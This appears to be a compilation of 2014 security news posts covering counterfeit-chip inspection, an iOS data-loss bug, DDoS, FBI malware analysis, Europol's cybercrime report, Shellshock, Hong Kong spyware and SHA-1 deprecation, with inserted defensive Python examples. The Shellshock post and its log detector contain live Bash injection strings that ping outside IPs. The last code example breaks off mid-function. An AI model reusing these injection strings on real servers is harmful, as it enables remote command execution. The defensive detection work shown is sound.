Oct 2 14

DARPA ASOM technology identifies counterfeit microelectronics

by Pierluigi Paganini

DARPA announced the deployment of ASOM technology, which will be used to inspect critical equipment for counterfeit microelectronics.

The presence of counterfeit microelectronics in cybersecurity equipment is considered a critical problem for the US Government; in the military sector, hardware qualification has assumed crucial importance for the national cyber security strategy.

The US DARPA supports the development of the Integrity and Reliability of Integrated Circuits (IRIS) program to prevent the diffusion of counterfeit microelectronics in US military systems. The IRIS program was started to improve hardware qualification in the military industry; its scope is the identification of any anomaly in the ICs present in critical equipment.

The official post published by DARPA highlights the dramatic growth of the worldwide IC market in the last decades: in 2013, the import value of integrated circuits was $231 billion, up 20 percent from the previous year. The majority of microelectronics in cybersecurity equipment is today manufactured in the Far East to reduce costs, but in several cases security experts have raised doubts about the integrity of circuitry components.

Researchers with SRI International, an IRIS performer, have announced they have provided Advanced Scanning Optical Microscope (ASOM) technology to the Naval Surface Warfare Center (NSWC) in Crane, Indiana.


Over the years the US Government has designed numerous forensic tools for the analysis of microelectronics provided by military partners. The laboratory equipment used by experts under the Integrity and Reliability of Integrated Circuits (IRIS) program allows engineers to scan components of the sophisticated circuits present in any kind of device used in the military and other critical sectors.

The ASOM technology allows the inspection of integrated circuits (ICs) with impressive precision by scanning them with a narrow infrared laser beam. It could be used by law enforcement to inspect equipment under investigation, allowing the detection of counterfeit microelectronics. The ASOM is able to probe microelectronic circuits at the nanometer scale, revealing information about chip construction as well as the function implemented by the circuits of the component at the transistor level.

“The Advanced Scanning Optical Microscope—one of many IRIS-developed technologies—offers important hardware security and reliability assurance capabilities,” said Kerry Bernstein, DARPA program manager. “These tools are optimized to support the mission of ensuring trust in microelectronics in DoD labs such as NSWC Crane.”

As explained in the blog post published by DARPA, military demand for integrated circuits (ICs) is a small part of the overall market, nearly one percent; for this reason the DoD has limited ability to influence global production.

“Without the ability to influence and regulate the off-shore fabrication of IC, there is a risk that parts acquired for DoD systems may not meet stated specifications for performance and reliability,” said Bernstein. “This risk increases considerably with the proliferation of counterfeit IC in the marketplace.”

The ASOM technology is considered a success for the agency because its inspection capabilities allow engineers to conduct nondestructive tests and identify counterfeit components, which is essential for the design of the nation’s weapons and other critical systems.

Pierluigi Paganini

(Security Affairs – DARPA, ASOM)

Oct 1 14

Flawed iOS 8’s Reset All Settings Option erases iCloud Docs

by Pierluigi Paganini

The MacRumors forum reported a serious flaw in iOS 8’s ‘Reset All Settings’ option which causes the deletion of iCloud Drive documents.

The Fappening case has raised questions about the level of security offered by iCloud and other cloud storage services. Apple was criticized for the way its security experts managed the flaw in the iCloud file storage service that, according to multiple sources, was exploited by hackers to steal nude photos of celebrities. The company has announced and implemented a series of security improvements to protect users’ privacy with the new version of its mobile operating system, iOS 8.0.1, including data encryption by default and two-factor authentication for the iCloud service.

But it seems that the problems for Apple are not over with the launch of the new iOS 8 system, because experts discovered a new critical bug in the new mobile OS. The vulnerability discovered in iOS 8.0.1 deletes data stored in the cloud without the user’s permission. The bug was first disclosed by MacRumors in a post titled “Bug in iOS 8’s ‘Reset All Settings’ Option Also Erases iCloud Drive Documents”, which reported the alert issued by many members of the popular forum.

“It appears that there may be a serious bug with the “Reset All Settings” option in iOS 8, causing users who activate the feature to lose all of their iWork documents stored in iCloud Drive. According to multiple posters on the MacRumors forums, using the “Reset All Settings” option under General –> Reset has caused documents to be permanently deleted from iCloud Drive.” states the post.

The “Reset All Settings” option is typically used to reset the user’s network settings, but it seems that the functionality also deletes all of the user’s files from iCloud Drive. The effect is not intentional: as described under the General category in Settings for iOS 8, the Reset All Settings option is supposed to reset iOS device settings while retaining the user’s data and media, and the option explicitly states that “No data or media will be deleted.”


Many users experienced the inconvenience: their documents were wiped out after they pressed the Reset All Settings button. According to the forum members, the problem affects documents from iWork apps, such as Pages, Numbers and Keynote.

“In our own testing, using “Reset All Settings” deleted all iWork documents stored in iCloud Drive on the iPhone and on iCloud.com. After allowing time for syncing to a Mac running OS X Yosemite, all of the documents disappeared from that machine as well. Preview and TextEdit documents, which cannot be accessed on the iPhone, remained untouched on the Mac.” reported MacRumors as the result of its own test of the flaw.

Until Apple releases a fix, iOS 8 users are advised to avoid using the “Reset All Settings” option.

“Users who have iCloud Drive enabled may want to refrain from using the “Reset All Settings” option on their devices for the time being, in order to avoid accidentally erasing important documents stored in iCloud Drive.” closes the post on MacRumors.

Pierluigi Paganini

(Security Affairs – iCloud , Reset All Settings)

Oct 1 14

Ello Social Network knocked down by a cyber attack

by Pierluigi Paganini

Ello, the new social network which is considered the anti-Facebook, was knocked down on Sunday by a distributed denial of service (DDoS) attack.

In these days, many articles have reported the birth of Ello, a new social network considered a possible antagonist of the giant Facebook. Ello’s creator describes it as a “tool for empowerment”, highlighting how similar social media could be used to manipulate people.

The manifesto of the Ello social network says “a social network can be a tool for empowerment. Not a tool to deceive, coerce and manipulate — but a place to connect, create and celebrate life.”

Ello is an invite-only social network, and the company is advertising this characteristic in an attempt to attract users from other major social media platforms. Its creator promises a network free from ads and with great respect for users’ privacy. It’s no mystery that data collected by social media is treated as a precious commodity by private companies that analyze it to customize commercial offers and to conduct any kind of research.

Last week the Ello social network reached a peak of popularity, as founder Paul Budnitz told Business Insider. This rapid growth is probably annoying someone and is attracting the attention of cybercriminals.

“We’re up to 38,000 signups per hour recently,” said Budnitz.

Last Sunday the Ello social network suffered a major distributed denial of service (DDoS) attack; the attack started late on Sunday evening (CET) and the Ello platform was not accessible for over 30 minutes. The network posted a message on its status page confirming the ongoing attack:


“Investigating – We are undergoing a potential denial of service attack.” states the message from the company.

The company identified the sources of the DDoS attack and blocked the IPs involved in the offense, but as usually happens in these cases this is a temporary countermeasure which does not protect Ello from future attacks. Many experts have speculated that the attack was commissioned by a competitor, or that it may have been an intimidating action for purposes of extortion.

As the popularity of Ello continues to grow, it will likely face more DDoS attacks like this one; attacks of this kind are very easy to arrange and the underground offers every kind of product and service to launch them.

A DDoS attack is a very effective method to bring down a website and can be carried out by threat actors without any particular expense.

At the time of writing, no one has claimed responsibility for the DDoS attack against Ello’s systems.

Pierluigi Paganini

(Security Affairs – Ello, DDoS)

Oct 1 14

FBI opens its Malware Investigator portal to the private industry

by Pierluigi Paganini

The FBI Operational Technology Division which is responsible for malware analysis opens its Malware Investigator portal to the private industry.

The FBI has opened its Malware Investigator portal to industry in order to improve information sharing on this type of cyber threat and to improve incident response in case of attacks. The FBI hopes to speed up the investigation process in case of an attack and to allow private companies to autonomously respond to an infection based on a new strain of malware without a heavy reverse-engineering load.

“Malware Investigator is a tool that provides users the ability to submit suspected malware files and within as little as an hour, receive detailed technical information about what the malware does and what it may be targeting.” states the official Malware Investigator portal.

During the ceremony for the launch of the Malware Investigator portal, Information crime unit chief Steve Pandelides explained the positive impact for both law enforcement and the private sector. Private companies will have more information related to a specific infection and will be able to quickly mitigate the threat; on the other side, the FBI will have the opportunity to assess incidents in real time and monitor their evolution across the various industries.

“After submission, the report can get turned around in a matter of minutes to a matter of hours,” Pandelides said. “It will enable our private partners to protect their company’s networks and help our state and local law enforcement partners further their investigations. It will also provide the FBI a global view of the malware threat.”


Malicious code submitted to the Malware Investigator portal will be correlated against other submissions and analyzed by the FBI’s intelligence, which will produce detailed reports. Initially it will work for Windows malware, and it will be expanded to collect other families of malicious code as well. This kind of analysis has immense value for malware analysts, who will be able to track the evolution of malicious code over time and track the capabilities of the APT groups and hackers behind a malicious campaign.


Recently I introduced the excellent work done by the independent researcher Brandon Dixon, who has analyzed for years the metadata on submissions to the VirusTotal service, identifying patterns related to many bad actors.

“The analysis conducted by Dixon has an immense value: from the observation of VirusTotal submissions over time it is possible to understand how hackers work, which improvements they have made to their code and what their cyber capabilities are. This information allows analysts to build a profile of the threat actors which could help to solve the problem of attribution in case of attack, improve detection capabilities and predict further offensives.” I wrote.

Malware will be analyzed in part through fuzzy hashing, including section hashing, a virus-scanning cluster, analysis of file system modifications, sandboxing and other techniques.
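One way to see what “section hashing” buys an analyst, as an added example that is not code from the FBI’s Malware Investigator or BACSS: hash each PE section separately rather than the whole file, so that two builds which differ in code but reuse a data section still correlate with each other. Everything below is constructed, including the two minimal, non-loadable PE images and their section contents; the header offsets follow the PE/COFF layout (e_lfanew at 0x3C, a 20-byte COFF header, 40-byte section headers).

```python
"""Section-level hashing for correlating malware submissions.  Added example,
not code from the FBI's Malware Investigator or BACSS.  Two CONSTRUCTED,
non-loadable PE images are built inline: different .text, identical .rdata."""
import hashlib
import struct


def build_pe(sections):
    """Build a minimal PE image: DOS header with e_lfanew, 'PE\\0\\0', COFF file
    header (no optional header), section table, then the raw section data."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader=0, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(sections)   # data starts right after the table
    table, data = b"", b""
    for name, payload in sections:
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics (CODE|EXECUTE|READ)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), len(payload), 0x1000,
                             len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
        data += payload
        raw_ptr += len(payload)
    return dos + b"PE\x00\x00" + coff + table + data


def section_hashes(pe):
    """Map section name -> SHA-256 of its raw bytes, located via the PE headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image (missing PE signature)")
    coff = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    num_sections, opt_size = coff[1], coff[5]
    table = e_lfanew + 4 + 20 + opt_size            # section table follows the optional header
    hashes = {}
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        body = pe[raw_ptr:raw_ptr + raw_size]
        hashes[name.rstrip(b"\x00").decode("ascii")] = hashlib.sha256(body).hexdigest()
    return hashes


def shared_sections(pe_a, pe_b):
    """Names of sections whose contents are byte-identical across two samples."""
    ha, hb = section_hashes(pe_a), section_hashes(pe_b)
    return sorted(n for n in ha if hb.get(n) == ha[n])


# Constructed samples: a builder kit reusing one data blob across two builds.
SHARED_RDATA = b"shared resource blob from a builder kit" + b"\x00" * 25
SAMPLE_A = build_pe([(b".text", b"\x55\x8b\xec" + b"\x90" * 29), (b".rdata", SHARED_RDATA)])
SAMPLE_B = build_pe([(b".text", b"\x55\x8b\xec" + b"\xcc" * 29), (b".rdata", SHARED_RDATA)])


def correlate():
    """Whole-file hashes miss the link between the samples; section hashes find it."""
    whole_file_match = hashlib.sha256(SAMPLE_A).hexdigest() == hashlib.sha256(SAMPLE_B).hexdigest()
    return {"whole_file_match": whole_file_match, "shared_sections": shared_sections(SAMPLE_A, SAMPLE_B)}


if __name__ == "__main__":
    print(correlate())   # whole_file_match False, shared_sections ['.rdata']
```

On real submissions the same loop runs over every section of every sample, and a shared hash for a code or resource section across otherwise unrelated files is exactly the kind of pivot that ties a campaign to a common toolkit.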

The FBI has opened API access for organizations which plan to integrate the system into their architecture; in this way private entities can benefit from the research made by the FBI with its analytic tools, including an automated malware analysis system, known as the Binary Analysis Characterization and Storage System (BACSS), that is now used enterprise-wide by the bureau.

The BACSS system provides the FBI’s investigators and security experts with technical information about the malicious code used in an attack as well as correlation with other infections. The Bureau’s Jonathan Burns explained during the Virus Bulletin conference in Seattle last week that, based on the success of BACSS, the FBI approved the development of a second, unclassified malware analysis system, Malware Investigator.

As explained by law enforcement the FBI began manual malware analysis in 1998 and over subsequent years it has designed its own tools to analyze the threats.

The Malware Investigator portal will help the FBI to raise awareness and share the results of its research with industry.

Pierluigi Paganini

(Security Affairs – Malware Investigator portal, FBI)

Sep 30 14

Europol issued 2014 iOCTA report on evolution of cybercrime

by Pierluigi Paganini

Europol has issued the 2014 Internet Organised Crime Threat Assessment (iOCTA) report to provide details about on-going developments in the cyber criminal ecosystem.

The Europol European Cybercrime Centre (EC3) has issued the 2014 Internet Organised Crime Threat Assessment (iOCTA), which describes the evolution of cybercrime and the sales models adopted in the criminal ecosystem.

This ‘Crime-as-a-Service’ business model is considered a winning choice for the cybercrime ecosystem; the model is in fact able to ensure the “innovation and sophistication” of the solutions offered. With the adoption of this business model, the entry barriers into cybercrime are being lowered, allowing criminals with little technical expertise to venture into cybercrime.

“These days, almost anyone can become a cyber-criminal. This puts an ever increasing pressure on law enforcement authorities to keep up. We need to use our new knowledge of how organised crime operates online to launch more transnational operations. We need to ensure that investigations into payment card fraud and online child abuse don’t stop at national borders,” says Cecilia Malmström, Commissioner for Home Affairs.

The document explains how organised crime is leveraging underground forums, black markets, the deep web and crypto currency schemes to conduct illicit activities. Money laundering, data theft and child pornography are a few examples of the illegal activities countered by Europol.

“A professional, continuously evolving service-based criminal industry drives the innovation of tools and methods used by criminals and facilitates the digital underground through a multitude of complementary services, extending the attack capacity to those otherwise lacking the skills,” states the iOCTA report. “Traditional organised crime groups (OCGs), including those with a mafia-style structure, are beginning to use the service-based nature of the cyber crime market to carry out more sophisticated crimes [by] buying access to the skills they require.”

The document issued by Europol remarks on the important role of Europol’s EC3 in the fight against cybercrime, highlighting its crucial role in the joint, multi-national operations that modern cybercrime investigations demand.


Darknets are privileged places in cyberspace to offer any kind of illegal product and service; a growing number of criminal gangs exploit the anonymity offered by such networks to arrange their activities.

“Child sex offenders and producers make increasing use of the dark net and other similar areas. New forms of child sexual exploitation online such as the live streaming of on-demand abuse of children present new challenges for law enforcement.”

Anonymizing networks like Tor are used to host black marketplaces where criminals sell drugs, weapons and hacking services.

New paradigms like the Internet of Things (IoT) and cloud computing are offering new opportunities for criminals:

“The advent of the Internet of Everything, combined with the ever-increasing number of internet users globally creates a broader attack surface, new attack vectors and more points of entry,” reads the report.

I reached out to Troels Oerting, Head of Europol’s European Cybercrime Centre (EC3), requesting a comment.

“The Internet is a wonderful invention. It will create growth and prosperity and enable all levels of society to access and share. But it is also a very dangerous place and crime in cyberspace is booming. The area attracts new and old criminal networks taking advantage of the easy access to victims, high profit and low risk of being caught. We need to change this. And we need to start discussing how. Freedom is never free.” said Troels Oerting.


The 2014 iOCTA also provides a set of recommendations for law enforcement to successfully address cyber criminal activities; it highlights the importance of public and private partnerships and co-operation in the fight against cybercrime. The recommendations include:

  • Prevention – Awareness
  • Prevention – Capacity Building & Training
  • Partnerships
  • Protection
  • Investigation

Information sharing is a crucial aspect of the challenge posed by cybercrime, and cooperation with other entities is essential in this delicate moment.

Pierluigi Paganini

(Security Affairs – Europol, iOCTA)

Sep 30 14

Apple released a patch for the Shellshock vulnerability

by Pierluigi Paganini

Apple has just released its patch for the Shellshock vulnerability. The company provided an update for OS X Lion, Mountain Lion and Mavericks.

A few days ago the Internet community was shocked by the revelation of a new critical flaw, dubbed Bash Bug, which affects the Bash component in billions of Unix and Linux systems worldwide. Apple, after a rapid verification, released an official statement to reassure its Mac OS X users; the company declared that the vast majority of Mac computers are not at risk from the Bash Bug, aka the “Shellshock” bug:

“The vast majority of OS X users are not at risk to recently reported bash vulnerabilities. Bash, a UNIX command shell and language included in OS X, has a weakness that could allow unauthorized users to remotely gain control of vulnerable systems. With OS X, systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services. We are working to quickly provide a software update for our advanced UNIX users.” states the Apple public statement.

In short, the majority of Apple OS X users were considered by the company to be safe so long as they hadn’t configured any advanced access to their systems. The statement was criticized by the IT security community due to the false sense of security it gave to Mac OS X users, because their systems were in any case vulnerable to the Bash Bug. To avoid problems I suggested that Apple OS X users disable any advanced UNIX options while waiting for the patch to be issued.

The Shellshock patch arrived tonight; the updates are available for the following OS versions:

Unfortunately, just after the disclosure of Shellshock threat actors were already trying to exploit the Bash Bug flaw, scanning the entire Internet to identify vulnerable machines and run their exploits.

The security firm Incapsula reported that in a 12-hour period its systems recorded 725 attacks per hour, originating from 400 unique IP addresses mainly located in the US and China, against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said. 

“In the four days that have passed since the Shellshock vulnerability disclosure, Incapsula’s web application firewall has deflected over 217,089 exploit attempts on over 4,115 domains. During this period the average attack rate has nearly doubled, climbing to over 1,970 attacks per hour. As of this time, Incapsula’s system has documented Shellshock attacks originating from over 890 offending IPs worldwide.” states a blog post from Incapsula.


Experts at AlienVault also confirmed that the disclosure of the flaw has triggered numerous attacks; the team is running a new module in their honeypots to track attempts to exploit the ShellShock bug, and in just 24 hours they detected several hits. The majority of attacks are scanning the Internet, simply sending a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138
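A small detector for honeypot or access-log records like the ones above, added here as an example and not code from the post, AlienVault or Incapsula. It keys on the Bash function-import prologue `() { :; };` that every Shellshock attempt has to carry, whichever header delivers it, and attributes each hit to the source IP of the request record it followed. The sample records are the quoted honeypot lines re-typed as constructed input, plus one ordinary request that must not match.

```python
"""Spot Shellshock exploit attempts in honeypot / access-log records.
Added example; not code from the post, AlienVault or Incapsula.  SAMPLE_LOG
re-types the honeypot lines quoted in the post as constructed input and adds
one ordinary request that must not match."""
import re

# Bash function-import prologue abused by Shellshock: "() {" ... "};" and then
# the injected command.  Spacing varies between attackers, so it is left flexible.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;(?P<cmd>.*)")
# Honeypot request record:  <ip> - - [<timestamp>] "<request line>" <status> ...
REQUEST_RE = re.compile(r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) - - \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')

SAMPLE_LOG = [
    '209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -',
    "referer, () { :; }; ping -c 11 209.126.230.74",
    '122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200',
    '89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200',
    "user-agent, () { :;}; /bin/ping -c 1 198.101.206.138",
    '198.51.100.7 - - [25/Sep/2014 07:30:00] "GET /index.html HTTP/1.1" 200',   # constructed, benign
    "user-agent, Mozilla/5.0 (compatible; example)",                          # constructed, benign
]


def is_shellshock_payload(value):
    """True when a header value carries the Bash function-definition prologue."""
    return SHELLSHOCK_RE.search(value) is not None


def detect_shellshock(lines):
    """Walk request records and the header lines that follow each one; return one
    hit per header carrying the prologue, tagged with the owning request's IP."""
    hits, current = [], None
    for line in lines:
        req = REQUEST_RE.match(line)
        if req:
            current = req.groupdict()        # subsequent header lines belong to this request
            continue
        if current is None or ", " not in line:
            continue
        header, value = line.split(", ", 1)  # honeypot writes "<header>, <value>"
        match = SHELLSHOCK_RE.search(value)
        if match:
            hits.append({
                "ip": current["ip"],
                "timestamp": current["ts"],
                "request": current["req"],
                "header": header.strip().lower(),
                "command": match.group("cmd").strip(),
            })
    return hits


if __name__ == "__main__":
    for hit in detect_shellshock(SAMPLE_LOG):
        print(f"{hit['ip']} via {hit['header']}: {hit['command']}")
```

The same regex can be dropped into a WAF rule or a log-search query; matching on the prologue rather than on any particular command keeps the detection valid as the payloads change.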

The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different strains of malware on the victims.

The majority of the attacks aim to gain a shell on a vulnerable machine in order to hijack it; according to data provided by Incapsula, nearly 18.37 percent of the attacks are attempts to establish remote access and use it to hijack the server (e.g., using Python or Perl scripts), while DDoS malware accounts for 16.64 percent.

Don’t waste time, update your system!

Pierluigi Paganini

(Security Affairs – Apple, Shellshock )

Sep 30 14

A mobile spyware used to track activists in Hong Kong

by Pierluigi Paganini

A fake Occupy Central app containing spyware is being used by unknown actors to track activists in Hong Kong. Evidence suggests the involvement of Chinese entities.

A fake Occupy Central app is targeting the smartphones of activists belonging to the Occupy Central pro-democracy movement with spyware. The malicious app has circulated online claiming to be an instrument to coordinate the members of the movement. At the time of writing, the number of mobile users infected by the app is not clear.

The spyware is disguised as an Android app, dubbed Code4HK, purportedly designed by a group of coders trying to improve government transparency in Hong Kong.


The threat actor behind the malicious app sent a link to the application in classic phishing messages to targeted members of the movement; the messages were sent from an unknown phone number with the following text.

“Check out this Android app designed by Code4HK for the coordination of Occupy Central!” the message read.

Lau Sau-yin, a spokeswoman for Occupy Central, officially warned people to avoid installing the application because it hides spyware. Code4HK also revealed that its development team was involved in neither the development nor the distribution of the application.

“None of the Code4HK community has done any application on [Occupy Central] at the moment nor sent the message,” the statement read. 

Regarding the nature of the Android application, Code4HK suggested it was generic spyware.

“I agree it looks quite off the shelf, not specialised for us,” said Vincent Lau Chun-yin, a member of the group.

The malicious app, like many other spyware, once installed accesses the user’s information stored on the device, including contacts, phone call history, location, browsing history and SMS.

Siu Cheong Leung, a senior consultant with the Hong Kong Computer Emergency Response Team Coordination Centre, confirmed that the application is able to record audio from the surrounding environment making it ideal for surveillance activities.

“On the face it is not suspicious,” he added. “However once it is installed, it will unpack data from itself to install a second mobile app,” which then connects to a server based in South Korea. 

The server, which was used by the bad actors to host the C&C, has a log-in in simplified Chinese, a language mainly used in China.

The attribution is still a mystery; it is difficult to say who deployed the malware, but it is surely someone who is very interested in the situation in Hong Kong.

Pierluigi Paganini

(Security Affairs – Hong Kong, spyware)

Sep 29 14

SHA-1 has been deprecated, what can I do?

by Pierluigi Paganini

The SHA-1 cryptographic hash algorithm is known to be vulnerable: collision attacks against it are too affordable, and attacks will get cheaper soon.

Many websites today use digital certificates signed using algorithms based on the SHA-1 hash algorithm. Hashing algorithms are used to ensure the integrity of the certificate in the signing process; a flawed algorithm could allow an attacker to forge fraudulent certificates.

In the past, collision attacks against the MD5 hash algorithm allowed threat actors to obtain fraudulent certificates, and security experts want to avoid similar problems for SHA-1.

Principal vendors are working to phase out support for the SHA-1 hash algorithm, which is vulnerable to collision attacks that will soon be practical: in 2012 experts demonstrated how breaking SHA-1 is becoming feasible, and in November 2013 Microsoft announced that it will phase out SHA-1 certificates after 2016.

“Collision attacks against SHA-1 are too affordable for us to consider it safe for the public web PKI. We can only expect that attacks will get cheaper.” states Google in an official statement on the topic. SHA-1’s use on the Internet has been deprecated since 2011, when the CA/Browser Forum, an industry group of leading web browsers and certificate authorities (CAs) working together to establish basic security requirements for SSL certificates, published its Baseline Requirements for SSL. These Requirements recommended that all CAs transition away from SHA-1 as soon as possible, and followed similar events in other industries and sectors, such as NIST deprecating SHA-1 for government use in 2010.

To get an idea of the impact of the deprecation of SHA-1, let’s analyze the data provided by SSL Pulse, which confirms that only 14.8% of sites used SHA-256 certificates in September 2014.


“A collision attack is therefore well within the range of what an organized crime syndicate can practically budget by 2018, and a university research project by 2021.” said the expert Bruce Schneier.

Microsoft’s decision is shared by other IT giants like Mozilla and Google; the popular search engine, for example, will penalize websites that use SHA-1 certificates expiring during 2016 and after.

Certification Authorities (CAs) and web site administrators have to upgrade their digital certificates to use signature algorithms other than SHA-1; valid alternatives are SHA-256, SHA-384 or SHA-512.

“Sites with end-entity certificates that expire between 1 January 2016 and 31 December 2016 (inclusive), and which include a SHA-1-based signature as part of the certificate chain, will be treated as “secure, but with minor errors”.  Sites with end-entity certificates that expire on or after 1 January 2017, and which include a SHA-1-based signature as part of the certificate chain, will be treated as “affirmatively insecure”. Sub resources from such domain will be treated as “active mixed content”. The current visual display for “affirmatively insecure” is a lock with a red X, and a red strike-through text treatment in the URL scheme.” states the blog post published by Google titled “Gradually sunsetting SHA-1“.

Mozilla has aligned its position on the acceptance of SHA-1 based certificates: such certificates should not be issued after January 1, 2016, or trusted after January 1, 2017. Section 8 of Mozilla’s CA Certificate Maintenance Policy states:

“We consider the following algorithms and key sizes to be acceptable and supported in Mozilla products: SHA-1 (until a practical collision attack against SHA-1 certificates is imminent). NIST Guidance recommended that SHA-1 certificates should not be trusted beyond 2014. However, there are still many Web sites that are using SSL certificates with SHA-1 based signatures, so we agree with the positions of Microsoft and Google that SHA-1 certificates should not be issued after January 1, 2016, or trusted after January 1, 2017. In particular, CAs should not be issuing new SHA-1 certificates for SSL and Code Signing, and should be migrating their customers off of SHA-1 intermediate and end-entity certificates. If a CA still needs to issue SHA-1 certificates for compatibility reasons, then those SHA-1 certificates should expire before January 2017. More information is available in Mozilla’s list of Potentially Problematic CA Practices.”

To be aligned with suggestions provided by the NIST and IT giants I recommend you to:

  • Inventory your existing digital certificates; in complex environments this task can be automated using specific tools that scan the entire company network.
  • Replace SHA-1 certificates that expire after 2015; a good policy is to start from the most valuable websites for the company business and from those websites using certificates that expire after 2016.
  • Assess those server platforms which might not be able to support SHA-256, or superior, certificates (e.g. Windows Server 2003). These systems might require an upgrade or a patching activity.
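A starting point for the inventory step, as an added example that is not code from the post, Google or Mozilla: a minimal DER walker that pulls the signature algorithm OID and the notAfter date out of an X.509 certificate and rates it against the Chrome schedule quoted above. The OID table and the UTCTime century rule follow RFC 5280; the certificate produced by make_test_cert() is a constructed, unsigned dummy used only so the code runs offline, and the rating strings are this example’s own labels. Run inspect_certificate() over every certificate in a chain, since the Chrome rule applies to any SHA-1 signature in it.

```python
"""Certificate inventory helper for the SHA-1 sunset: read the signature algorithm and
expiry out of a DER X.509 certificate and rate it against the Chrome schedule quoted in
the post.  Added example, not code from the post or from Google/Mozilla.  The DER walker
works on real certificates; make_test_cert() builds a CONSTRUCTED, unsigned dummy."""
from datetime import datetime

SIG_ALGS = {  # signature AlgorithmIdentifier OIDs -> names
    "1.2.840.113549.1.1.4": "md5WithRSA",
    "1.2.840.113549.1.1.5": "sha1WithRSA",
    "1.2.840.113549.1.1.11": "sha256WithRSA",
    "1.2.840.113549.1.1.12": "sha384WithRSA",
    "1.2.840.113549.1.1.13": "sha512WithRSA",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
}

def read_tlv(buf, pos):
    """Return (tag, body, next_pos) for the DER element that starts at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = count of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:                      # base-128; high bit set on all but the last byte
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def parse_time(tag, body):
    text = body.decode("ascii")
    if tag == 0x17:                         # UTCTime YYMMDDHHMMSSZ; RFC 5280: YY >= 50 is 19YY
        text = ("19" if int(text[:2]) >= 50 else "20") + text
    return datetime.strptime(text, "%Y%m%d%H%M%SZ")  # GeneralizedTime (0x18) already has YYYY

def inspect_certificate(der_bytes):
    """Return (signature algorithm name, notAfter datetime) for a DER certificate."""
    _, cert, _ = read_tlv(der_bytes, 0)              # Certificate ::= SEQUENCE
    _, tbs, pos = read_tlv(cert, 0)                  # tbsCertificate
    _, sig_alg, _ = read_tlv(cert, pos)              # signatureAlgorithm (outer)
    _, oid_body, _ = read_tlv(sig_alg, 0)
    tag, _, pos = read_tlv(tbs, 0)
    pos = pos if tag == 0xA0 else 0                  # skip optional [0] EXPLICIT version
    for _ in range(3):                               # serialNumber, signature, issuer
        _, _, pos = read_tlv(tbs, pos)
    _, validity, _ = read_tlv(tbs, pos)
    _, _, pos = read_tlv(validity, 0)                # notBefore
    tag, not_after, _ = read_tlv(validity, pos)
    dotted = decode_oid(oid_body)
    return SIG_ALGS.get(dotted, dotted), parse_time(tag, not_after)

def rate_sha1_sunset(alg, not_after):
    """Apply the Chrome treatment quoted in the post to one certificate."""
    if "md5" in alg.lower():
        return "MD5 signature: replace immediately"
    if "sha1" not in alg.lower():
        return "ok"
    if not_after >= datetime(2017, 1, 1):
        return "affirmatively insecure: replace now"
    if not_after >= datetime(2016, 1, 1):
        return "secure, but with minor errors: replace soon"
    return "expires before 2016: reissue with SHA-256 or stronger at renewal"

# ---- CONSTRUCTED test certificate (not a real or signed certificate) ----
def der(tag, body):
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        length = b"\x81" + bytes([n]) if n < 0x100 else b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + body

def oid(dotted):
    arcs = [int(x) for x in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        while a >> 7:
            a >>= 7
            chunk.insert(0, 0x80 | (a & 0x7F))
        out.extend(chunk)
    return der(0x06, bytes(out))

def make_test_cert(sig_oid, not_after_utc=b"170301000000Z"):
    alg = der(0x30, oid(sig_oid) + b"\x05\x00")                     # AlgorithmIdentifier {oid, NULL}
    name = der(0x30, der(0x31, der(0x30, oid("2.5.4.3") + der(0x0C, b"example.test"))))
    validity = der(0x30, der(0x17, b"140901000000Z") + der(0x17, not_after_utc))
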